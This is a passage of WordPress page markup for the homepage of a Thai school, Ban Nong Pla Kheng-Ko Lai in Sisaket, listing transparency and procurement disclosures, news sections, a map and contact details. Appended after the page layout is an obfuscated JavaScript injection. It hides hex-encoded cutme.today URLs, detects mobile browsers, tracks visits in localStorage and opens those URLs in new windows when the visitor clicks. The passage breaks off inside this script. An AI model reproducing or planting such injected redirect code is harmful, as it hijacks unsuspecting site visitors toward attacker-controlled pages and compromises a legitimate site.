900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#32e6a4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 